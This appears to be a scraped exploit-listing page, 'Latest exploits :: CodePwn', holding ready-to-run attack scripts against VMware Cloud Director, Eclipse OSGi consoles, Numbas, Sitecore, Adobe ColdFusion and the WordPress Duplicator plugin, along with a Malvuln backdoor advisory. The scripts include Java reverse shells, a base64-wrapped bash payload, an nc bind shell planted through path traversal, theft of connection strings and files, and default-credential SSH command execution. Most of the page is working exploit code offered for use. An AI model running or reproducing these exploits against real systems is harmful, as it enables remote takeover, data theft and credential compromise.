Latest exploits :: CodePwn

<pre><code># Exploit Title: [VMware Cloud Director | Bypass identity verification] # Google Dork: [non] # Date: [12/06/2023] # Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly) # Version: [10.5] # CVE : [CVE-2023-34060] import requests import paramiko import subprocess import socket import argparse import threading # Define a function to check if a port is open def is_port_open(ip, port): # Create a socket object s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Set the timeout to 1 second s.settimeout(1) # Try to connect to the port try: s.connect((ip, port)) # The port is open return True except: # The port is closed return False finally: # Close the socket s.close() # Define a function to exploit a vulnerable device def exploit_device(ip, port, username, password, command): # Create a ssh client object client = paramiko.SSHClient() # Set the policy to accept any host key client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # Connect to the target using the credentials client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False) # Execute the command and get the output stdin, stdout, stderr = client.exec_command(command) # Print the output print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}") # Close the ssh connection client.close() # Parse the arguments from the user parser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director") parser.add_argument("ip", help="The target IP address") parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check") parser.add_argument("-u", "--username", default="root", help="The username for ssh") parser.add_argument("-w", "--password", default="vmware", help="The password for ssh") parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices") args = parser.parse_args() # Loop through the ports and check for the vulnerability for port in args.ports: # Check if the port is open if is_port_open(args.ip, port): # The port is open, send a GET request to the port and check the status code response = requests.get(f"http://{args.ip}:{port}") if response.status_code == 200: # The port is open and vulnerable print(f"Port {port} is vulnerable to CVE-2023-34060") # Create a thread to exploit the device thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command)) # Start the thread thread.start() else: # The port is open but not vulnerable print(f"Port {port} is not vulnerable to CVE-2023-34060") else: # The port is closed print(f"Port {port} is closed") </code></pre>

<pre><code>#!/usr/bin/python # Exploit Title: [OSGi v3.7.2 Console RCE] # Date: [2023-07-28] # Exploit Author: [Andrzej Olchawa, Milenko Starcik, # VisionSpace Technologies GmbH] # Exploit Repository: # [https://github.com/visionspacetec/offsec-osgi-exploits.git] # Vendor Homepage: [https://eclipse.dev/equinox] # Software Link: [https://archive.eclipse.org/equinox/] # Version: [3.7.2 and before] # Tested on: [Linux kali 6.3.0-kali1-amd64] # License: [MIT] # # Usage: # python exploit.py --help # # Examples: # python exploit.py --rhost=localhost --rport=1337 --lhost=localhost \ # --lport=4444 # # python exploit.py --rhost=localhost --rport=1337 --payload= \ # "curl http://192.168.100.100/osgi_test" """ This is an exploit that allows to open a reverse shell connection from the system running OSGi v3.7.2 and earlier. """ import argparse import base64 import socket def parse(): """ This fnction is used to parse and return command-line arguments. """ parser = argparse.ArgumentParser( prog="OSGi-3.7.2-console-RCE", description="This tool will let you open a reverse shell from the " "system that is running OSGi with the '-console' " "option in version 3.7.2 (or before).", epilog="Happy Hacking! :)", ) parser.add_argument("--rhost", dest="rhost", help="remote host", type=str, required=True) parser.add_argument("--rport", dest="rport", help="remote port", type=int, required=True) parser.add_argument("--lhost", dest="lhost", help="local host", type=str, required=False) parser.add_argument("--lport", dest="lport", help="local port", type=int, required=False) parser.add_argument("--payload", dest="custom_payload", help="custom payload", type=str, required=False) parser.add_argument("--version", action="version", version="%(prog)s 0.1.0") args = parser.parse_args() if args.custom_payload and (args.lhost or args.lport): parser.error( "either --payload or both --lport and --rport are required.") return args def generate_payload(lhost, lport, custom_payload): """ This function generates the whole payload ready for the delivery. """ payload = "" if custom_payload: payload = custom_payload print("(*) Using custom payload.") elif lhost and lport: payload = \ "echo 'import java.io.IOException;import java.io.InputStream;" \ "import java.io.OutputStream;import java.net.Socket;class Rev" \ "Shell {public static void main(String[] args) throws Excepti" \ "on { String host=\"%s\";int port=%s;String cmd=\"sh\";Proces" \ "s p=new ProcessBuilder(cmd).redirectErrorStream(true).start(" \ ");Socket s=new Socket(host,port);InputStream pi=p.getInputSt" \ "ream(),pe=p.getErrorStream(), si=s.getInputStream();OutputSt" \ "ream po=p.getOutputStream(), so=s.getOutputStream();while(!s" \ ".isClosed()){while(pi.available()>0)so.write(pi.read());whil" \ "e(pe.available()>0)so.write(pe.read());while(si.available()>" \ "0)po.write(si.read());so.flush();po.flush();Thread.sleep(50)" \ ";try {p.exitValue();break;}catch (Exception e){}};p.destroy(" \ ");s.close();}}' > RevShell.java ; java ./RevShell.java" % ( lhost, lport) print("(+) Using Java reverse shell payload.") bash_payload = b"bash -c {echo,%s}|{base64,-d}|{bash,-i}" % ( base64.b64encode(payload.encode())) wrapped_payload = b"fork \"%s\"\n" % (bash_payload) return wrapped_payload def deliver_payload(rhost, rport, payload): """ This function connects to the target host and delivers the payload. It returns True if successful; False otherwise. """ print("(*) Sending payload...") try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((rhost, rport)) sock.send(payload) sock.close() except socket.error as err: print(f"(-) Could not deliver the payload to {rhost}:{rport}!") print(err) return False return True def main(args): """ Main function. """ payload = generate_payload(args.lhost, args.lport, args.custom_payload) success = deliver_payload(args.rhost, args.rport, payload) if success: print("(+) Done.") else: print("(-) Finished with errors.") if __name__ == "__main__": main(parse()) </code></pre>

<pre><code>#!/usr/bin/python # Exploit Title: [OSGi v3.8-3.18 Console RCE] # Date: [2023-07-28] # Exploit Author: [Andrzej Olchawa, Milenko Starcik, # VisionSpace Technologies GmbH] # Exploit Repository: # [https://github.com/visionspacetec/offsec-osgi-exploits.git] # Vendor Homepage: [https://eclipse.dev/equinox] # Software Link: [https://archive.eclipse.org/equinox/] # Version: [3.8 - 3.18] # Tested on: [Linux kali 6.3.0-kali1-amd64] # License: [MIT] # # Usage: # python exploit.py --help # # Example: # python exploit.py --rhost=192.168.0.133 --rport=1337 --lhost=192.168.0.100 \ # --lport=4444 """ This is an exploit that allows to open a reverse shell connection from the system running OSGi v3.8-3.18 and earlier. """ import argparse import socket import sys import threading from functools import partial from http.server import BaseHTTPRequestHandler, HTTPServer # Stage 1 of the handshake message HANDSHAKE_STAGE_1 = \ b"\xff\xfd\x01\xff\xfd" \ b"\x03\xff\xfb\x1f\xff" \ b"\xfa\x1f\x00\x74\x00" \ b"\x37\xff\xf0\xff\xfb" \ b"\x18" # Stage 2 of the handshake message HANDSHAKE_STAGE_2 = \ b"\xff\xfa\x18\x00\x58" \ b"\x54\x45\x52\x4d\x2d" \ b"\x32\x35\x36\x43\x4f" \ b"\x4c\x4f\x52\xff\xf0" # The buffer of this size is enough to handle the telnet handshake BUFFER_SIZE = 2 * 1024 class HandlerClass(BaseHTTPRequestHandler): """ This class overrides the BaseHTTPRequestHandler. It provides a specific functionality used to deliver a payload to the target host. """ _lhost: str _lport: int def __init__(self, lhost, lport, *args, **kwargs): self._lhost = lhost self._lport = lport super().__init__(*args, **kwargs) def _set_response(self): self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() def do_GET(self): # pylint: disable=C0103 """ This method is responsible for the playload delivery. """ print("Delivering the payload...") self._set_response() self.wfile.write(generate_revshell_payload( self._lhost, self._lport).encode('utf-8')) raise KeyboardInterrupt def log_message(self, format, *args): # pylint: disable=W0622 """ This method redefines a built-in method to suppress BaseHTTPRequestHandler log messages. """ return def generate_revshell_payload(lhost, lport): """ This function generates the Revershe Shell payload that will be executed on the target host. """ payload = \ "import java.io.IOException;import java.io.InputStream;" \ "import java.io.OutputStream;import java.net.Socket;" \ "class RevShell {public static void main(String[] args) " \ "throws Exception { String host=\"%s\";int port=%d;" \ "String cmd=\"sh\";Process p=new ProcessBuilder(cmd)." \ "redirectErrorStream(true).start();Socket s=new Socket(host,port);" \ "InputStream pi=p.getInputStream(),pe=p.getErrorStream(), " \ "si=s.getInputStream();OutputStream po=p.getOutputStream()," \ "so=s.getOutputStream();while(!s.isClosed()){while(pi.available()" \ ">0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());" \ "while(si.available()>0)po.write(si.read());so.flush();po.flush();" \ "Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};" \ "p.destroy();s.close();}}\n" % ( lhost, lport) return payload def run_payload_delivery(lhost, lport): """ This function is responsible for payload delivery. """ print("Setting up the HTTP server for payload delivery...") handler_class = partial(HandlerClass, lhost, lport) server_address = ('', 80) httpd = HTTPServer(server_address, handler_class) try: print("[+] HTTP server is running.") httpd.serve_forever() except KeyboardInterrupt: print("[+] Payload delivered.") except Exception as err: # pylint: disable=broad-except print("[-] Failed payload delivery!") print(err) finally: httpd.server_close() def generate_stage_1(lhost): """ This function generates the stage 1 of the payload. """ stage_1 = b"fork \"curl http://%s -o ./RevShell.java\"\n" % ( lhost.encode() ) return stage_1 def generate_stage_2(): """ This function generates the stage 2 of the payload. """ stage_2 = b"fork \"java ./RevShell.java\"\n" return stage_2 def establish_connection(rhost, rport): """ This function creates a socket and establishes the connection to the target host. """ print("[*] Connecting to OSGi Console...") sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((rhost, rport)) print("[+] Connected.") return sock def process_handshake(sock): """ This function process the handshake with the target host. """ print("[*] Processing the handshake...") sock.recv(BUFFER_SIZE) sock.send(HANDSHAKE_STAGE_1) sock.recv(BUFFER_SIZE) sock.send(HANDSHAKE_STAGE_2) sock.recv(BUFFER_SIZE) sock.recv(BUFFER_SIZE) def deliver_payload(sock, lhost): """ This function executes the first stage of the exploitation. It triggers the payload delivery mechanism to the target host. """ stage_1 = generate_stage_1(lhost) print("[*] Triggering the payload delivery...") sock.send(stage_1) sock.recv(BUFFER_SIZE) sock.recv(BUFFER_SIZE) def execute_payload(sock): """ This function executes the second stage of the exploitation. It sends payload which is responsible for code execution. """ stage_2 = generate_stage_2() print("[*] Executing the payload...") sock.send(stage_2) sock.recv(BUFFER_SIZE) sock.recv(BUFFER_SIZE) print("[+] Payload executed.") def exploit(args, thread): """ This function sends the multistaged payload to the tareget host. """ try: sock = establish_connection(args.rhost, args.rport) process_handshake(sock) deliver_payload(sock, args.lhost) # Join the thread running the HTTP server # and wait for payload delivery thread.join() execute_payload(sock) sock.close() print("[+] Done.") except socket.error as err: print("[-] Could not connect!") print(err) sys.exit() def parse(): """ This fnction is used to parse and return command-line arguments. """ parser = argparse.ArgumentParser( prog="OSGi-3.8-console-RCE", description="This tool will let you open a reverse shell from the " "system that is running OSGi with the '-console' " "option in versions between 3.8 and 3.18.", epilog="Happy Hacking! :)", ) parser.add_argument("--rhost", dest="rhost", help="remote host", type=str, required=True) parser.add_argument("--rport", dest="rport", help="remote port", type=int, required=True) parser.add_argument("--lhost", dest="lhost", help="local host", type=str, required=False) parser.add_argument("--lport", dest="lport", help="local port", type=int, required=False) parser.add_argument("--version", action="version", version="%(prog)s 0.1.0") return parser.parse_args() def main(args): """ Main fuction. """ thread = threading.Thread( target=run_payload_delivery, args=(args.lhost, args.lport)) thread.start() exploit(args, thread) if __name__ == "__main__": main(parse()) </code></pre>

<pre><code># Exploit Title: Numbas < v7.3 - Remote Code Execution # Google Dork: N/A # Date: March 7th, 2024 # Exploit Author: Matheus Boschetti # Vendor Homepage: https://www.numbas.org.uk/ # Software Link: https://github.com/numbas/Numbas # Version: 7.2 and below # Tested on: Linux # CVE: CVE-2024-27612 import sys, requests, re, argparse, subprocess, time from bs4 import BeautifulSoup s = requests.session() def getCSRF(target): url = f"http://{target}/" req = s.get(url) soup = BeautifulSoup(req.text, 'html.parser') csrfmiddlewaretoken = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value'] return csrfmiddlewaretoken def createTheme(target): # Format request csrfmiddlewaretoken = getCSRF(target) theme = 'ExampleTheme' boundary = '----WebKitFormBoundaryKUMXsLP31HzARUV1' data = ( f'--{boundary}\r\n' 'Content-Disposition: form-data; name="csrfmiddlewaretoken"\r\n' '\r\n' f'{csrfmiddlewaretoken}\r\n' f'--{boundary}\r\n' 'Content-Disposition: form-data; name="name"\r\n' '\r\n' f'{theme}\r\n' f'--{boundary}--\r\n' ) headers = {'Content-Type': f'multipart/form-data; boundary={boundary}', 'User-Agent': 'Mozilla/5.0', 'Accept': '*/*', 'Connection': 'close'} # Create theme and return its ID req = s.post(f"http://{target}/theme/new/", headers=headers, data=data) redir = req.url split = redir.split('/') id = split[4] print(f"\t[i] Theme created with ID {id}") return id def login(target, user, passwd): print("\n[i] Attempting to login...") csrfmiddlewaretoken = getCSRF(target) data = {'csrfmiddlewaretoken': csrfmiddlewaretoken, 'username': user, 'password': passwd, 'next': '/'} # Login login = s.post(f"http://{target}/login/", data=data, allow_redirects=True) res = login.text if("Logged in as" not in res): print("\n\n[!] Login failed!") sys.exit(-1) # Check if logged and fetch ID usermatch = re.search(r'Logged in as (.*?)', res) if usermatch: user = usermatch.group(1) idmatch = re.search(r'<a href="/accounts/profile/(.*?)/">', res) if idmatch: id = idmatch.group(1) print(f"\t[+] Logged in as \"{user}\" with ID {id}") def checkVuln(url): print("[i] Checking if target is vulnerable...") # Attempt to read files themeID = createTheme(url) target = f"http://{url}/themes/{themeID}/edit_source?filename=../../../../../../../../../.." hname = s.get(f"{target}/etc/hostname") ver = s.get(f"{target}/etc/issue") hnamesoup = BeautifulSoup(hname.text, 'html.parser') versoup = BeautifulSoup(ver.text, 'html.parser') hostname = hnamesoup.find('textarea').get_text().strip() version = versoup.find('textarea').get_text().strip() if len(hostname) < 1: print("\n\n[!] Something went wrong - target might not be vulnerable.") sys.exit(-1) print(f"\n[+] Target \"{hostname}\" is vulnerable!") print(f"\t[i] Running: \"{version}\"") # Cleanup - delete theme print(f"\t\t[i] Cleanup: deleting theme {themeID}...") target = f"http://{url}/themes/{themeID}/delete" csrfmiddlewaretoken = getCSRF(url) data = {'csrfmiddlewaretoken':csrfmiddlewaretoken} s.post(target, data=data) def replaceInit(target): # Overwrite __init__.py with arbitrary code rport = '8443' payload = f"import subprocess;subprocess.Popen(['nc','-lnvp','{rport}','-e','/bin/bash'])" csrfmiddlewaretoken = getCSRF(target) filename = '../../../../numbas_editor/numbas/__init__.py' themeID = createTheme(target) data = {'csrfmiddlewaretoken': csrfmiddlewaretoken, 'source': payload, 'filename': filename} print("[i] Delivering payload...") # Retry 5 times in case something goes wrong... for attempt in range(5): try: s.post(f"http://{target}/themes/{themeID}/edit_source", data=data, timeout=10) except Exception as e: pass # Establish connection to bind shell time.sleep(2) print(f"\t[+] Payload delivered, establishing connection...\n") if ":" in target: split = target.split(":") ip = split[0] else: ip = str(target) subprocess.Popen(["nc", "-n", ip, rport]) while True: pass def main(): parser = argparse.ArgumentParser() if len(sys.argv) <= 1: print("\n[!] No option provided!") print("\t- check: Passively check if the target is vulnerable by attempting to read files from disk\n\t- exploit: Attempt to actively exploit the target\n") print(f"[i] Usage: python3 {sys.argv[0]} <option> --target 172.16.1.5:80 --user example --passwd qwerty") sys.exit(-1) group = parser.add_mutually_exclusive_group(required=True) group.add_argument('action', nargs='?', choices=['check', 'exploit'], help='Action to perform: check or exploit') parser.add_argument('--target', help='Target IP:PORT') parser.add_argument('--user', help='Username to authenticate') parser.add_argument('--passwd', help='Password to authenticate') args = parser.parse_args() action = args.action target = args.target user = args.user passwd = args.passwd print("\n\t\t-==[ CVE-2024-27612: Numbas Remote Code Execution (RCE) ]==-") if action == 'check': login(target, user, passwd) checkVuln(target) elif action == 'exploit': login(target, user, passwd) replaceInit(target) else: sys.exit(-1) if __name__ == "__main__": main() </code></pre>

<pre><code>#!/usr/bin/env python3 # # Exploit Title: Sitecore - Remote Code Execution v8.2 # Exploit Author: abhishek morla # Google Dork: N/A # Date: 2024-01-08 # Vendor Homepage: https://www.sitecore.com/ # Software Link: https://dev.sitecore.net/ # Version: 10.3 # Tested on: windows64bit / mozila firefox # CVE : CVE-2023-35813 # The vulnerability impacts all Experience Platform topologies (XM, XP, XC) from 9.0 Initial Release to 10.3 Initial Release; 8.2 is also impacted # Blog : https://medium.com/@abhishekmorla/uncovering-cve-2023-35813-retrieving-core-connection-strings-in-sitecore-5502148fce09 # Video POC : https://youtu.be/vWKl9wgdTB0 import argparse import requests from urllib.parse import quote from rich.console import Console console = Console() def initial_test(hostname): # Initial payload to test vulnerability test_payload = ''' <%@Register TagPrefix = 'x' Namespace = 'System.Runtime.Remoting.Services' Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' %> <x:RemotingService runat='server' Context-Response-ContentType='TestVulnerability' /> ''' encoded_payload = quote(test_payload) url = f"https://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index" headers = {"Content-Type": "application/x-www-form-urlencoded"} data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload) response = requests.post(url, headers=headers, data=data, verify=False) # Check for the test string in the Content-Type of the response return 'TestVulnerability' in response.headers.get('Content-Type', '') def get_payload(choice): # Payload templates for different options payloads = { '1': "<%$ ConnectionStrings:core %>", '2': "<%$ ConnectionStrings:master %>", '3': "<%$ ConnectionStrings:web %>" } base_payload = ''' <%@Register TagPrefix = 'x' Namespace = 'System.Runtime.Remoting.Services' Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' %> <x:RemotingService runat='server' Context-Response-ContentType='{}' /> ''' return base_payload.format(payloads.get(choice, "Invalid")) def main(hostname): if initial_test(hostname): print("Exploiting, Please wait...") console.print("[bold green]The target appears to be vulnerable. Proceed with payload selection.[/bold green]") print("Select the payload to use:") print("1: Core connection strings") print("2: Master connection strings") print("3: Web connection strings") payload_choice = input("Enter your choice (1, 2, or 3): ") payload = get_payload(payload_choice) encoded_payload = quote(payload) url = f"http://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index" headers = {"Content-Type": "application/x-www-form-urlencoded"} data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload) response = requests.post(url, headers=headers, data=data) if 'Content-Type' in response.headers: print("Content-Type from the response header:") print("\n") print(response.headers['Content-Type']) else: print("No Content-Type in the response header. Status Code:", response.status_code) else: print("The target does not appear to be vulnerable to CVE-2023-35813.") if __name__ == "__main__": console.print("[bold green]Author: Abhishek Morla[/bold green]") console.print("[bold red]CVE-2023-35813[/bold red]") parser = argparse.ArgumentParser(description='Test for CVE-2023-35813 vulnerability in Sitecore') parser.add_argument('hostname', type=str, help='Hostname of the target Sitecore instance') args = parser.parse_args() main(args.hostname) </code></pre>

<pre><code># Exploit Title: File Read Arbitrary Exploit for CVE-2023-26360 # Google Dork: [not] # Date: [12/28/2023] # Exploit Author: [Youssef Muhammad] # Vendor Homepage: [ https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html] # Software Link: [ https://drive.google.com/drive/folders/17ryBnFhswxiE1sHrNByxMVPKfUnwqmp0] # Version: [Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 and earlier] # Tested on: [Windows, Linux] # CVE : [CVE-2023-26360] import sys import requests import json BANNER = """ ██████ ██ ██ ███████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ █████ █████ █████ ██ ██ ██ █████ █████ █████ █████ ███████ █████ ███████ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██████ ████ ███████ ███████ ██████ ███████ ██████ ███████ ██████ ██████ ██████ ██████ """ RED_COLOR = "\033[91m" GREEN_COLOR = "\032[42m" RESET_COLOR = "\033[0m" def print_banner(): print(RED_COLOR + BANNER + " Developed by SecureLayer7" + RESET_COLOR) return 0 def run_exploit(host, target_file, endpoint="/CFIDE/wizards/common/utils.cfc", proxy_url=None): if not endpoint.endswith('.cfc'): endpoint += '.cfc' if target_file.endswith('.cfc'): raise ValueError('The TARGET_FILE must not point to a .cfc') targeted_file = f"a/{target_file}" json_variables = json.dumps({"_metadata": {"classname": targeted_file}, "_variables": []}) vars_get = {'method': 'test', '_cfclient': 'true'} uri = f'{host}{endpoint}' response = requests.post(uri, params=vars_get, data={'_variables': json_variables}, proxies={'http': proxy_url, 'https': proxy_url} if proxy_url else None) file_data = None splatter = '</TD></TD></TD></TH></TH></TH>' if response.status_code in [404, 500] and splatter in response.text: file_data = response.text.split(splatter, 1)[0] if file_data is None: raise ValueError('Failed to read the file. Ensure the CFC_ENDPOINT, CFC_METHOD, and CFC_METHOD_PARAMETERS are set correctly, and that the endpoint is accessible.') print(file_data) # Save the output to a file output_file_name = 'output.txt' with open(output_file_name, 'w') as output_file: output_file.write(file_data) print(f"The output saved to {output_file_name}") if __name__ == "__main__": if not 3 <= len(sys.argv) <= 5: print("Usage: python3 script.py <host> <target_file> [endpoint] [proxy_url]") sys.exit(1) print_banner() host = sys.argv[1] target_file = sys.argv[2] endpoint = sys.argv[3] if len(sys.argv) > 3 else "/CFIDE/wizards/common/utils.cfc" proxy_url = sys.argv[4] if len(sys.argv) > 4 else None try: run_exploit(host, target_file, endpoint, proxy_url) except Exception as e: print(f"Error: {e}") </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024 Original source: https://malvuln.com/advisory/6268df4c9c805c90725dde4fe5ef6fea.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Beastdoor.oq Vulnerability: Unauthenticated Remote Command Execution Description: The malware listens on TCP port 1332, makes outbound connections to SMTP port 25 and executes a PE file named svchost.exe dropped in Windows directory. Third party adversaries who can reach an infected host can issue various numeric commands made available by the backdoor. Family: Beastdoor Type: PE32 MD5: 6268df4c9c805c90725dde4fe5ef6fea Vuln ID: MVID-2024-0674 Dropped files: svchost.exe Disclosure: 03/09/2024 Commands: 27 return victims username and computer information 5 or 19 will shutdown victims computer 6 restart victims computer 9 delete all files including program files 16 victim computer screen goes black 28 returns clipboard information 30 terminates the backdoor and deletes it from the system Exploit/PoC: C:\sec>nc64.exe x.x.x.x 1332 27 27 VICTIM DESKTOP-2C3IQHO Windows 8.1 Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHzC:\WINDOWS\C:\WINDOWS\system32\1565 x 8302.01svchost.exe svchost.exe 28 28 I dont like u 30 Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code># Exploit Title: WordPress Plugin Duplicator < 1.5.7.1 - Unauthenticated Sensitive Data Exposure to Account Takeover # Google Dork: inurl:("plugins/duplicator/") # Date: 2023-12-04 # Exploit Author: Dmitrii Ignatyev # Vendor Homepage: https://duplicator.com/?utm_source=duplicator_free&utm_medium=wp_org&utm_content=desc_details&utm_campaign=duplicator_free # Software Link: https://wordpress.org/plugins/duplicator/ # Version: 1.5.7.1 # Tested on: Wordpress 6.4 # CVE : CVE-2023-6114# CVE-Link : https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1/ # CVE-Link : https://research.cleantalk.org/cve-2023-6114-duplicator-poc-exploit/A severe vulnerability has been discovered in the directory */wordpress/wp-content/backups-dup-lite/tmp/*. This flaw not only exposes extensive information about the site, including its configuration, directories, and files, but more critically, it provides unauthorized access to sensitive data within the database and all data inside. Exploiting this vulnerability poses an imminent threat, leading to potential *brute force attacks on password hashes and, subsequently, the compromise of the entire system*.* POC*: 1) It is necessary that either the administrator or auto-backup works automatically at the scheduled time 2) Exploit will send file search requests every 5 seconds 3) I attack the site with this vulnerability using an exploit Exploit sends a request to the server every 5 seconds along the path “*http://your_site/wordpress/wp-content/backups-dup-lite/tmp/ <http://your_site/wordpress/wp-content/backups-dup-lite/tmp/>”* and if it finds something in the index of, it instantly parses all the data and displays it on the screen Exploit (python3): import requests from bs4 import BeautifulSoup import re import time url = "http://127.0.0.1/wordpress/wp-content/backups-dup-lite/tmp/" processed_files = set() def get_file_names(url): response = requests.get(url) if response.status_code == 200 and len(response.text) > 0: soup = BeautifulSoup(response.text, 'html.parser') links = soup.find_all('a') file_names = [] for link in links: file_name = link.get('href') if file_name != "../" and not file_name.startswith("?"): file_names.append(file_name) return file_names return [] def get_file_content(url, file_name): file_url = url + file_name if re.search(r'\.zip(?:\.|$)', file_name, re.IGNORECASE): print(f"Ignoring file: {file_name}") return None file_response = requests.get(file_url) if file_response.status_code == 200: return file_response.text return None while True: file_names = get_file_names(url) if file_names: print("File names on the page:") for file_name in file_names: if file_name not in processed_files: print(file_name) file_content = get_file_content(url, file_name) if file_content is not None: print("File content:") print(file_content) processed_files.add(file_name) time.sleep(5) -- With best regards, Dmitrii Ignatyev, Penetration Tester </code></pre>